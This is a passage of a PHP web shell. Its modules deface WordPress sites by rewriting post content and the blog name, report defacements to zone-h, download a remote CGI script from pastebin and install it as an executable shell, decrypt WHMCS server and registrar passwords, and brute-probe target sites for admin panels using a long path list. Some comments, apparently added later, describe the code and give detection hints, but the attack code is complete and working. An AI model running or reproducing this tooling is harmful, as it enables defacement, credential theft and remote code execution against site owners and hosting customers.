  1635.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1636.                 $prefix = $dbprefix."posts";
  1637.                 $option = $dbprefix."options";
  1638.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1639.                 $db = mysql_select_db($dbname);
  1640.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1641.                 $result = mysql_fetch_array($q);
  1642.                 $id = $result[ID];
  1643.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1644.                 $result2 = mysql_fetch_array($q2);
  1645.                 $target = $result2[option_value];
  1646.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1647.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1648.                 echo "<div style='margin: 5px auto;'>";
  1649.                 if($target == '') {
  1650.                     echo "URL: <font color=red>error, cant take the domain name</font> -> ";
  1651.                 } else {
  1652.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1653.                 }
  1654.                 if(!$update OR !$conn OR !$db) {
  1655.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1656.                 } else {
  1657.                     echo "<font color=white>success replaced.</font><br>";
  1658.                 }
  1659.                 echo "</div>";
  1660.                 mysql_close($conn);
  1661.             }
  1662.         }
  1663.     } else {
  1664.         echo "<center>
  1665.         <h1>Auto Edit Title+Content WordPress</h1>
  1666.         <form method='post'>
  1667.         DIR Config: <br>
  1668.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1669.         Set Title: <br>
  1670.         <input type='text' name='new_title' value='Hacked by Ameer_Awwad & MHM' placeholder='New Title'><br><br>
  1671.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1672.         <span>If you choose <u>Y</u> enter your defac script ( simple advice ),if you choose <u>N</u> it's hard to fill.</span><br>
  1673.         <textarea name='edit_content' placeholder='script example: https://pastebin.com/hbkUvinW' style='width: 450px; height: 150px;'></textarea><br>
  1674.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1675.         </form>
  1676.         <span>NB: Tools will workif you run it in folder of <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1677.         ";
  1678.     }
  1679. } elseif($_GET['do'] == 'zoneh') {
  1680.     if($_POST['submit']) {
  1681.         $domain = explode("\r\n", $_POST['url']);
  1682.         $nick =  $_POST['nick'];
  1683.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1684.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1685.         function zoneh($url,$nick) {
                    // Sends one HTTP POST per call to the defacement-archive endpoint below,
                    // carrying the operator nickname ($nick) and one domain ($url), and returns
                    // the response body (CURLOPT_RETURNTRANSFER) or false when the request fails.
                    // The caller greps the response for an "OK" marker to report the outcome.
                    // Defender note: an outbound POST from a web server's PHP process to this
                    // host and path is a strong indicator that the site is already compromised;
                    // egress filtering or proxy logs on the hosting platform can surface it.
  1686.             $ch = curl_init("http://www.zone-h.com/notify/single");
  1687.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1688.                   curl_setopt($ch, CURLOPT_POST, true);
  1689.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1690.             return curl_exec($ch);
                    // Never reached: the statement follows the return above.
  1691.                   curl_close($ch);
  1692.         }
  1693.         foreach($domain as $url) {
  1694.             $zoneh = zoneh($url,$nick);
  1695.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1696.                 echo "$url -> <font color=white>OK</font><br>";
  1697.             } else {
  1698.                 echo "$url -> <font color=red>ERROR</font><br>";
  1699.             }
  1700.         }
  1701.     } else {
  1702.         echo "<center><form method='post'>
  1703.         <u>Defacer</u>: <br>
  1704.         <input type='text' name='nick' size='50' value='M.Y.S'><br>
  1705.         <u>Domains</u>: <br>
  1706.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1707.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1708.         </form>";
  1709.     }
  1710.     echo "</center>";
  1711. } elseif($_GET['do'] == 'cgi') {
  1712.     $cgi_dir = mkdir('idx_cgi', 0755);
  1713.     $file_cgi = "idx_cgi/cgi.izo";
  1714.     $isi_htcgi = "AddHandler cgi-script .izo";
  1715.     $htcgi = fopen(".htaccess", "w");
  1716.     fwrite($htcgi, $isi_htcgi);
  1717.     fclose($htcgi);
  1718.     $cgi_script = getsource("https://pastebin.com/raw/rZGBHWXQ");
  1719.     $cgi = fopen($file_cgi, "w");
  1720.     fwrite($cgi, $cgi_script);
  1721.     fclose($cgi);
  1722.     chmod($file_cgi, 0755);
  1723.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1724. }elseif(isset($_GET['do']) && ($_GET['do'] == 'whmcsdecod'))
  1725. {
  1726. ?>
  1727. <form action="?y=<?php echo $pwd; ?>&amp;do=whmcs" method="post">
  1728.  
  1729. <?php
  1730.  
  1731. function decrypt ($string,$cc_encryption_hash)
  1732. {
            // Reverses the reversible password encoding that this module attributes to
            // WHMCS: the caller passes tblservers.password values together with the
            // cc_encryption_hash value typed into the "WHMCS Decoder" form.
            //
            // $string             base64 text as stored in the database column
            // $cc_encryption_hash the installation secret taken from the form
            // returns             the decoded byte string
            //
            // Defender note: the only inputs are the stored value and cc_encryption_hash,
            // so a leaked configuration file plus read access to the database exposes
            // every server password stored this way. After an incident, rotate those
            // passwords and the hash together.

            // Key material: md5(md5(secret)) . md5(secret), reduced to raw bytes by _hash().
  1733.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  1734.     $hash_key = _hash ($key);
  1735.     $hash_length = strlen ($hash_key);
  1736.     $string = base64_decode ($string);
            // The first $hash_length bytes are a masked per-value prefix; the rest is the payload.
  1737.     $tmp_iv = substr ($string, 0, $hash_length);
  1738.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  1739.     $iv = $out = '';
  1740.     $c = 0;
            // Unmask the prefix by XOR with the hashed key; the result is the first block key.
  1741.     while ($c < $hash_length)
  1742.     {
  1743.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  1744.         ++$c;
  1745.     }
  1746.     $key = $iv;
  1747.     $c = 0;
            // XOR the payload byte by byte against the current block key. At every block
            // boundary the key is replaced by _hash(key . previous block of decoded output).
  1748.     while ($c < strlen ($string))
  1749.     {
  1750.         if (($c != 0 AND $c % $hash_length == 0))
  1751.         {
  1752.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  1753.         }
  1754.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  1755.         ++$c;
  1756.     }
  1757.     return $out;
  1758. }
  1759.  
  1760. function _hash ($string)
  1761. {
            // Helper for decrypt(): hashes $string and returns the digest as raw bytes
            // instead of hex text. sha1() is used when available (20-byte result); the
            // md5() branch is a fallback (16-byte result). The length of this return
            // value is what decrypt() uses as its block size.
  1762.     if (function_exists ('sha1'))
  1763.     {
  1764.         $hash = sha1 ($string);
  1765.     }
  1766.     else
  1767.     {
  1768.         $hash = md5 ($string);
  1769.     }
  1770.     $out = '';
  1771.     $c = 0;
            // Convert the hex digest to bytes, two hex characters per output byte.
  1772.     while ($c < strlen ($hash))
  1773.     {
  1774.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  1775.         $c += 2;
  1776.     }
  1777.     return $out;
  1778. }
  1779.  
  1780. echo "
  1781. <br><center><font size='5' color='#FFFFFF'><b>-=[ WHMCS Decoder ]=-</b></font></center>
  1782. <center>
  1783. <br>
  1784.  
  1785. <FORM action=''  method='post'>
  1786. <input type='hidden' name='form_action' value='2'>
  1787. <br>
  1788. <table class=tabnet style=width:320px;padding:0 1px;>
  1789. <tr><th colspan=2>WHMCS Decoder</th></tr>
  1790. <tr><td>db_host </td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  1791. <tr><td>db_username </td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  1792. <tr><td>db_password</td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
  1793. <tr><td>db_name</td><td><input type='text' style='color:#FFFFFF;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  1794. <tr><td>cc_encryption_hash</td><td><input style='color:#FFFFFF;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
  1795. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FFFFFF;background-color:'  value='Submit' name='Submit'></td>
  1796. </table>
  1797. </FORM>
  1798. </center>
  1799. ";
  1800.  
          // Analyst note: handler for the form above. It runs when the posted
          // form_action loosely equals 2 and takes the database host, user, password,
          // schema name and the encryption secret directly from the request body.
  1801.  if($_POST['form_action'] == 2 )
  1802.  {
  1803.  //include($file);
  1804.  $db_host=($_POST['db_host']);
  1805.  $db_username=($_POST['db_username']);
  1806.  $db_password=($_POST['db_password']);
  1807.  $db_name=($_POST['db_name']);
  1808.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
  1809.  
  1810.  
  1811.  
          // Uses the legacy mysql_* API (removed in PHP 7.0); none of the connect,
          // select or query return values is checked.
  1812.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  1813.         mysql_select_db($db_name,$link) ;
          // Reads every row of tblservers and prints type, active flag, hostname, IP
          // and username together with the decrypt()-ed password column.
          // Column values are echoed into the HTML without escaping.
          // Detection/response: a full-table read of tblservers or tblregistrars from
          // a script outside the billing application is worth alerting on; every
          // credential stored in those tables should be rotated after such an event.
  1814. $query = mysql_query("SELECT * FROM tblservers");
  1815. while($v = mysql_fetch_array($query)) {
  1816. $ipaddress = $v['ipaddress'];
  1817. $username = $v['username'];
  1818. $type = $v['type'];
  1819. $active = $v['active'];
  1820. $hostname = $v['hostname'];
  1821. echo("<center><table border='1'>");
  1822. $password = decrypt ($v['password'], $cc_encryption_hash);
  1823. echo("<tr><td>Type</td><td>$type</td></tr>");
  1824. echo("<tr><td>Active</td><td>$active</td></tr>");
  1825. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  1826. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  1827. echo("<tr><td>Username</td><td>$username</td></tr>");
  1828. echo("<tr><td>Password</td><td>$password</td></tr>");
  1829.  
  1830. echo "</table><br><br></center>";
  1831. }
  1832.  
          // Second pass: reconnects, then prints registrar / setting / decrypted value
          // for every row of tblregistrars. An empty decrypted value is shown as 0.
  1833.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  1834.         mysql_select_db($db_name,$link) ;
  1835. $query = mysql_query("SELECT * FROM tblregistrars");
  1836. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
  1837. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  1838. while($v = mysql_fetch_array($query)) {
  1839. $registrar     = $v['registrar'];
  1840. $setting = $v['setting'];
  1841. $value = decrypt ($v['value'], $cc_encryption_hash);
  1842. if ($value=="") {
  1843. $value=0;
  1844. }
          // $password is computed here but never printed in this loop.
  1845. $password = decrypt ($v['password'], $cc_encryption_hash);
  1846. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  1847. }
  1848. }
  1849. } elseif(isset($_GET['do']) && ($_GET['do'] == 'adfin'))
  1850. {
  1851. ?>
  1852. <form action="?y=<?php echo $pwd; ?>&amp;do=adfin" method="post">
  1853.  
  1854. <?php
  1855. set_time_limit(0);
  1856. error_reporting(0);
  1857. $list['front'] ="admin
  1858. adm
  1859. admincp
  1860. admcp
  1861. cp
  1862. modcp
  1863. moderatorcp
  1864. adminare
  1865. admins
  1866. cpanel
  1867. controlpanel";
  1868. $list['end'] = "admin1.php
  1869. adm/
  1870. _adm_
  1871. _admin_
  1872. _administrator_
  1873. operator
  1874. sika
  1875. adminweb
  1876. develop
  1877. ketua
  1878. redaktur
  1879. author
  1880. user
  1881. users
  1882. dinkesadmin
  1883. retel
  1884. panel
  1885. paneladmin
  1886. panellogin
  1887. redaksi
  1888. cp-admin
  1889. Login@web
  1890. admin1
  1891. admin2
  1892. admin3
  1893. admin4
  1894. admin5
  1895. admin6
  1896. admin7
  1897. admin8
  1898. admin9
  1899. admin10
  1900. master
  1901. master/index.php
  1902. master/login.php
  1903. terasadmin/index.php
  1904. terasadmin/login.php
  1905. rahasia
  1906. rahasia/login.php
  1907. rahasia/admin.php
  1908. rahasia/index.php
  1909. dinkesadmin/login.php
  1910. adminpmb
  1911. adminpmb/index.php
  1912. adminpmb/login.php
  1913. system
  1914. system/index.php
  1915. system/login.php
  1916. system/admin.php
  1917. webadmin
  1918. webadmin/index.php
  1919. webadmin/login.php
  1920. wpanel
  1921. wpanel/index.php
  1922. wpanel/login.php
  1923. adminpanel
  1924. adminpanel/index.php
  1925. adminpanel/login.php
  1926. adminkec
  1927. adminkec/index.php
  1928. adminkec/login.php
  1929. admindesa
  1930. admindesa/index.php
  1931. admindesa/login.php
  1932. adminkota
  1933. adminkota/index.php
  1934. adminkota/login.php
  1935. admin123
  1936. admin123/index.php
  1937. admin123/login.php
  1938. logout
  1939. logout/index.php
  1940. logout/login.php
  1941. logout/admin.php
  1942. adminweb_setting
  1943. admin1.html
  1944. admin
  1945. administrator
  1946. admin1.html
  1947. admin2.php
  1948. admin2.html
  1949. yonetim.php
  1950. yonetim.html
  1951. yonetici.php
  1952. yonetici.html
  1953. ccms/
  1954. ccms/login.php
  1955. ccms/index.php
  1956. maintenance/
  1957. webmaster/
  1958. adm/
  1959. configuration/
  1960. configure/
  1961. websvn/
  1962. admin/
  1963. admin/account.php
  1964. admin/account.html
  1965. admin/index.php
  1966. admin/index.html
  1967. admin/login.php
  1968. admin/login.html
  1969. admin/home.php
  1970. admin/controlpanel.html
  1971. admin/controlpanel.php
  1972. admin.php
  1973. admin.html
  1974. admin/cp.php
  1975. admin/cp.html
  1976. cp.php
  1977. cp.html
  1978. administrator/
  1979. administrator/index.html
  1980. administrator/index.php
  1981. administrator/login.html
  1982. administrator/login.php
  1983. administrator/account.html
  1984. administrator/account.php
  1985. administrator.php
  1986. administrator.html
  1987. login.php
  1988. login.html
  1989. modelsearch/login.php
  1990. moderator.php
  1991. moderator.html
  1992. moderator/login.php
  1993. moderator/login.html
  1994. moderator/admin.php
  1995. moderator/admin.html
  1996. moderator/
  1997. account.php
  1998. account.html
  1999. controlpanel/
  2000. controlpanel.php
  2001. controlpanel.html
  2002. admincontrol.php
  2003. admincontrol.html
  2004. adminpanel.php
  2005. adminpanel.html
  2006. admin1.asp
  2007. admin2.asp
  2008. yonetim.asp
  2009. yonetici.asp
  2010. admin/account.asp
  2011. admin/index.asp
  2012. admin/login.asp
  2013. admin/home.asp
  2014. admin/controlpanel.asp
  2015. admin.asp
  2016. admin/cp.asp
  2017. cp.asp
  2018. administrator/index.asp
  2019. administrator/login.asp
  2020. administrator/account.asp
  2021. administrator.asp
  2022. login.asp
  2023. modelsearch/login.asp
  2024. moderator.asp
  2025. moderator/login.asp
  2026. moderator/admin.asp
  2027. account.asp
  2028. controlpanel.asp
  2029. admincontrol.asp
  2030. adminpanel.asp
  2031. fileadmin/
  2032. fileadmin.php
  2033. fileadmin.asp
  2034. fileadmin.html
  2035. administration/
  2036. administration.php
  2037. administration.html
  2038. sysadmin.php
  2039. sysadmin.html
  2040. phpmyadmin/
  2041. myadmin/
  2042. sysadmin.asp
  2043. sysadmin/
  2044. ur-admin.asp
  2045. ur-admin.php
  2046. ur-admin.html
  2047. ur-admin/
  2048. Server.php
  2049. Server.html
  2050. Server.asp
  2051. Server/
  2052. wp-admin/
  2053. administr8.php
  2054. administr8.html
  2055. administr8/
  2056. administr8.asp
  2057. webadmin/
  2058. webadmin.php
  2059. webadmin.asp
  2060. webadmin.html
  2061. administratie/
  2062. admins/
  2063. admins.php
  2064. admins.asp
  2065. admins.html
  2066. administrivia/
  2067. Database_Administration/
  2068. WebAdmin/
  2069. useradmin/
  2070. sysadmins/
  2071. admin1/
  2072. system-administration/
  2073. administrators/
  2074. pgadmin/
  2075. directadmin/
  2076. staradmin/
  2077. ServerAdministrator/
  2078. SysAdmin/
  2079. administer/
  2080. LiveUser_Admin/
  2081. sys-admin/
  2082. typo3/
  2083. panel/
  2084. cpanel/
  2085. cPanel/
  2086. cpanel_file/
  2087. platz_login/
  2088. rcLogin/
  2089. blogindex/
  2090. formslogin/
  2091. autologin/
  2092. support_login/
  2093. meta_login/
  2094. manuallogin/
  2095. simpleLogin/
  2096. loginflat/
  2097. utility_login/
  2098. showlogin/
  2099. memlogin/
  2100. members/
  2101. login-redirect/
  2102. sub-login/
  2103. wp-login.php
  2104. login1/
  2105. dir-login/
  2106. login_db/
  2107. xlogin/
  2108. smblogin/
  2109. customer_login/
  2110. UserLogin/
  2111. login-us/
  2112. acct_login/
  2113. admin_area/
  2114. bigadmin/
  2115. project-admins/
  2116. phppgadmin/
  2117. pureadmin/
  2118. sql-admin/
  2119. radmind/
  2120. openvpnadmin/
  2121. wizmysqladmin/
  2122. vadmind/
  2123. ezsqliteadmin/
  2124. hpwebjetadmin/
  2125. newsadmin/
  2126. adminpro/
  2127. Lotus_Domino_Admin/
  2128. bbadmin/
  2129. vmailadmin/
  2130. Indy_admin/
  2131. ccp14admin/
  2132. irc-macadmin/
  2133. banneradmin/
  2134. sshadmin/
  2135. phpldapadmin/
  2136. macadmin/
  2137. administratoraccounts/
  2138. admin4_account/
  2139. admin4_colon/
  2140. radmind-1/
  2141. Super-Admin/
  2142. AdminTools/
  2143. cmsadmin/
  2144. SysAdmin2/
  2145. globes_admin/
  2146. cadmins/
  2147. phpSQLiteAdmin/
  2148. navSiteAdmin/
  2149. server_admin_small/
  2150. logo_sysadmin/
  2151. server/
  2152. database_administration/
  2153. power_user/
  2154. system_administration/
  2155. ss_vms_admin_sm/
  2156. adminarea/
  2157. bb-admin/
  2158. adminLogin/
  2159. panel-administracion/
  2160. instadmin/
  2161. memberadmin/
  2162. administratorlogin/
  2163. admin/admin.php
  2164. admin_area/admin.php
  2165. admin_area/login.php
  2166. siteadmin/login.php
  2167. siteadmin/index.php
  2168. siteadmin/login.html
  2169. admin/admin.html
  2170. admin_area/index.php
  2171. bb-admin/index.php
  2172. bb-admin/login.php
  2173. bb-admin/admin.php
  2174. admin_area/login.html
  2175. admin_area/index.html
  2176. admincp/index.asp
  2177. admincp/login.asp
  2178. admincp/index.html
  2179. webadmin/index.html
  2180. webadmin/admin.html
  2181. webadmin/login.html
  2182. admin/admin_login.html
  2183. admin_login.html
  2184. panel-administracion/login.html
  2185. nsw/admin/login.php
  2186. webadmin/login.php
  2187. admin/admin_login.php
  2188. admin_login.php
  2189. admin_area/admin.html
  2190. pages/admin/admin-login.php
  2191. admin/admin-login.php
  2192. admin-login.php
  2193. bb-admin/index.html
  2194. bb-admin/login.html
  2195. bb-admin/admin.html
  2196. admin/home.html
  2197. pages/admin/admin-login.html
  2198. admin/admin-login.html
  2199. admin-login.html
  2200. admin/adminLogin.html
  2201. adminLogin.html
  2202. home.html
  2203. rcjakar/admin/login.php
  2204. adminarea/index.html
  2205. adminarea/admin.html
  2206. webadmin/index.php
  2207. webadmin/admin.php
  2208. user.html
  2209. modelsearch/login.html
  2210. adminarea/login.html
  2211. panel-administracion/index.html
  2212. panel-administracion/admin.html
  2213. modelsearch/index.html
  2214. modelsearch/admin.html
  2215. admincontrol/login.html
  2216. adm/index.html
  2217. adm.html
  2218. user.php
  2219. panel-administracion/login.php
  2220. wp-login.php
  2221. adminLogin.php
  2222. admin/adminLogin.php
  2223. home.php
  2224. adminarea/index.php
  2225. adminarea/admin.php
  2226. adminarea/login.php
  2227. panel-administracion/index.php
  2228. panel-administracion/admin.php
  2229. modelsearch/index.php
  2230. modelsearch/admin.php
  2231. admincontrol/login.php
  2232. adm/admloginuser.php
  2233. admloginuser.php
  2234. admin2/login.php
  2235. admin2/index.php
  2236. adm/index.php
  2237. adm.php
  2238. affiliate.php
  2239. adm_auth.php
  2240. memberadmin.php
  2241. administratorlogin.php
  2242. admin/admin.asp
  2243. admin_area/admin.asp
  2244. admin_area/login.asp
  2245. admin_area/index.asp
  2246. bb-admin/index.asp
  2247. bb-admin/login.asp
  2248. bb-admin/admin.asp
  2249. pages/admin/admin-login.asp
  2250. admin/admin-login.asp
  2251. admin-login.asp
  2252. user.asp
  2253. webadmin/index.asp
  2254. webadmin/admin.asp
  2255. webadmin/login.asp
  2256. admin/admin_login.asp
  2257. admin_login.asp
  2258. panel-administracion/login.asp
  2259. adminLogin.asp
  2260. admin/adminLogin.asp
  2261. home.asp
  2262. adminarea/index.asp
  2263. adminarea/admin.asp
  2264. adminarea/login.asp
  2265. panel-administracion/index.asp
  2266. panel-administracion/admin.asp
  2267. modelsearch/index.asp
  2268. modelsearch/admin.asp
  2269. admincontrol/login.asp
  2270. adm/admloginuser.asp
  2271. admloginuser.asp
  2272. admin2/login.asp
  2273. admin2/index.asp
  2274. adm/index.asp
  2275. adm.asp
  2276. affiliate.asp
  2277. adm_auth.asp
  2278. memberadmin.asp
  2279. administratorlogin.asp
  2280. siteadmin/login.asp
  2281. siteadmin/index.asp
  2282. ADMIN/
  2283. paneldecontrol/
  2284. login/
  2285. cms/
  2286. admon/
  2287. ADMON/
  2288. administrador/
  2289. ADMIN/login.php
  2290. panelc/
  2291. ADMIN/login.html";
  2292. function template() {
          // Analyst note: prints the "Admin Finder" page in one echo: an inline
          // insertcode() JavaScript helper, the URL / "404 string" form, and the
          // output panes with ids rightcol, verified, total and logbox.
          // NOTE(review): $_POST['xploit_url'] and $_POST['xploit_404string'] are
          // concatenated into value="" attributes without HTML escaping, and
          // insertcode() assigns caller-supplied text to innerHTML, so request data is
          // reflected into the page as markup.
  2293. echo '
  2294.  
  2295. <script type="text/javascript">
  2296. <!--
  2297. function insertcode($text, $place, $replace)
  2298. {
  2299.    var $this = $text;
  2300.    var logbox = document.getElementById($place);
  2301.    if($replace == 0)
  2302.        document.getElementById($place).innerHTML = logbox.innerHTML+$this;
  2303.    else
  2304.        document.getElementById($place).innerHTML = $this;
  2305. //document.getElementById("helpbox").innerHTML = $this;
  2306. }
  2307. -->
  2308. </script>
  2309. <br>
  2310. <br>
  2311. <h1 class="technique-two">
  2312.  
  2313.  
  2314.  
  2315. </h1>
  2316.  
  2317. <div class="wrapper">
  2318. <div class="red">
  2319. <div class="tube">
  2320. <center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
  2321. <form action="" method="post" name="xploit_form">
  2322.  
  2323. <tr>
  2324. <tr>
  2325.     <b><td>URL</td>
  2326.     <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
  2327.     </td>
  2328. </tr><tr>
  2329.     <td>404 string</td>
  2330.     <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
  2331.     </td></b>
  2332. </tr><br><td>
  2333. <span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
  2334. </span></td></tr>
  2335. </form></td></tr>
  2336. <br /></table>
  2337. </div> <!-- /tube -->
  2338. </div> <!-- /red -->
  2339. <br />
  2340. <div class="green">
  2341. <div class="tube" id="rightcol">
  2342. Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
  2343. <b>Found ones:<br /></b>
  2344. </div> <!-- /tube -->
  2345. </div></center><!-- /green -->
  2346. <br clear="all" /><br />
  2347. <div class="blue">
  2348. <div class="tube" id="logbox">
  2349. <br />
  2350. <br />
  2351. Admin page Finder :<br /><br />
  2352. </div> <!-- /tube -->
  2353. </div> <!-- /blue -->
  2354. </div> <!-- /wrapper -->
  2355. <br clear="all"><br>';
  2356. }
  2357. function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
          // Analyst note: streams one progress message to the browser.
          //   $msg     text or markup to display ("<br />" is appended when $br is 1)
          //   $stop    when 1, the script exits right after the message is echoed
          //   $place   id of the element insertcode() writes into
          //   $replace 0 appends to the element, any other value overwrites it
          // NOTE(review): $msg, $place and $replace are spliced into single-quoted
          // JavaScript string literals with no escaping; callers pass request-derived
          // text (the probed URL), so a quote in that text alters the emitted script.
  2358.     if($br == 1) $msg .= "<br />";
  2359.     echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
  2360.     if($stop == 1) exit;
          // Push the output to the client immediately; errors are suppressed with @.
  2361.     @flush();@ob_flush();
  2362. }
  2363. function check($x, $front=0) {
          // Analyst note: reports whether one candidate location answers as an
          // existing page. Returns 1 for "found" and 0 otherwise.
          //   $x     candidate path, or a subdomain label when $front is non-zero
          //   $front 0 probes $site.$x; otherwise probes http://$x.$site/
          // Reads the globals $site and $false, which the calling script sets.
          // Every call makes the server itself issue up to two outbound HTTP requests
          // (get_headers, then file_get_contents) to a URL built from request data.
  2364.     global $_POST,$site,$false;
  2365.     if($front == 0) $t = $site.$x;
  2366.     else $t = 'http://'.$x.'.'.$site.'/';
  2367.     $headers = get_headers($t);
          // Treated as missing unless the first response header line contains "200".
          // eregi() was removed in PHP 7, so this line only runs on older interpreters.
  2368.     if (!eregi('200', $headers[0])) return 0;
  2369.     $data = @file_get_contents($t);
          // No 404 string supplied: a body loosely equal to the baseline page counts
          // as missing.
  2370.     if($_POST['xploit_404string'] == "") if($data == $false) return 0;
          // 404 string supplied: a body containing it counts as missing. strpos() is
          // used as a truth value, so a match at offset 0 is not recognised.
  2371.     if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
  2372.     return 1;
  2373. }
  2374.  
  2375. // --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  2376. template();
          // Analyst note: driver for the admin-path probe. It stops silently unless a
          // non-empty xploit_url was posted.
  2377. if(!isset($_POST['xploit_url'])) die;
  2378. if($_POST['xploit_url'] == '') die;
  2379. $site = $_POST['xploit_url'];
  2380. if ($site[strlen($site)-1] != "/") $site .= "/";
          // With no 404 string supplied, one request for a deliberately nonexistent
          // page is made and its body kept as the "not found" baseline for check().
          // The fixed file name in that request is a stable string to search for in
          // the access logs of probed sites.
  2381. if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
          // Split both word lists into one candidate per line, tolerating CRLF.
  2382. $list['end'] = str_replace("\r", "", $list['end']);
  2383. $list['front'] = str_replace("\r", "", $list['front']);
  2384. $pathes = explode("\n", $list['end']);
  2385. $frontpathes = explode("\n", $list['front']);
  2386. show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
  2387. $verificate = 0;
          // Pass 1: every $list['end'] entry is requested as a path under $site. The
          // requests are sequential and unthrottled, which shows up as a burst of
          // outbound HTTP traffic from the web server process.
  2388. foreach($pathes as $path) {
  2389.     show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
  2390.     $verificate++; show($verificate, 0, 0, 'verified', 1);
  2391.     if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
  2392.     else{
  2393.         show('<span style="color: #FFFFFF;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
  2394.         show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
  2395.     }
  2396. }
          // Reduce $site to the text between "//" and the next "/", and when it starts
          // with "www" drop the first four characters.
  2397. preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
  2398. if(substr($site, 0, 3) == "www") $site = substr($site, 4);
          // Pass 2: every $list['front'] entry is requested as a subdomain of that host.
  2399. foreach($frontpathes as $frontpath) {
  2400.     show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
  2401.     $verificate++; show($verificate, 0, 0, 'verified', 1);
  2402.     if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
  2403.     else{
  2404.         show('<span style="color: #FFFFFF;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
  2405.         show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
  2406.   }
  2407.  
  2408. }
  2409. }elseif($_GET['do'] == 'ngindexx') {
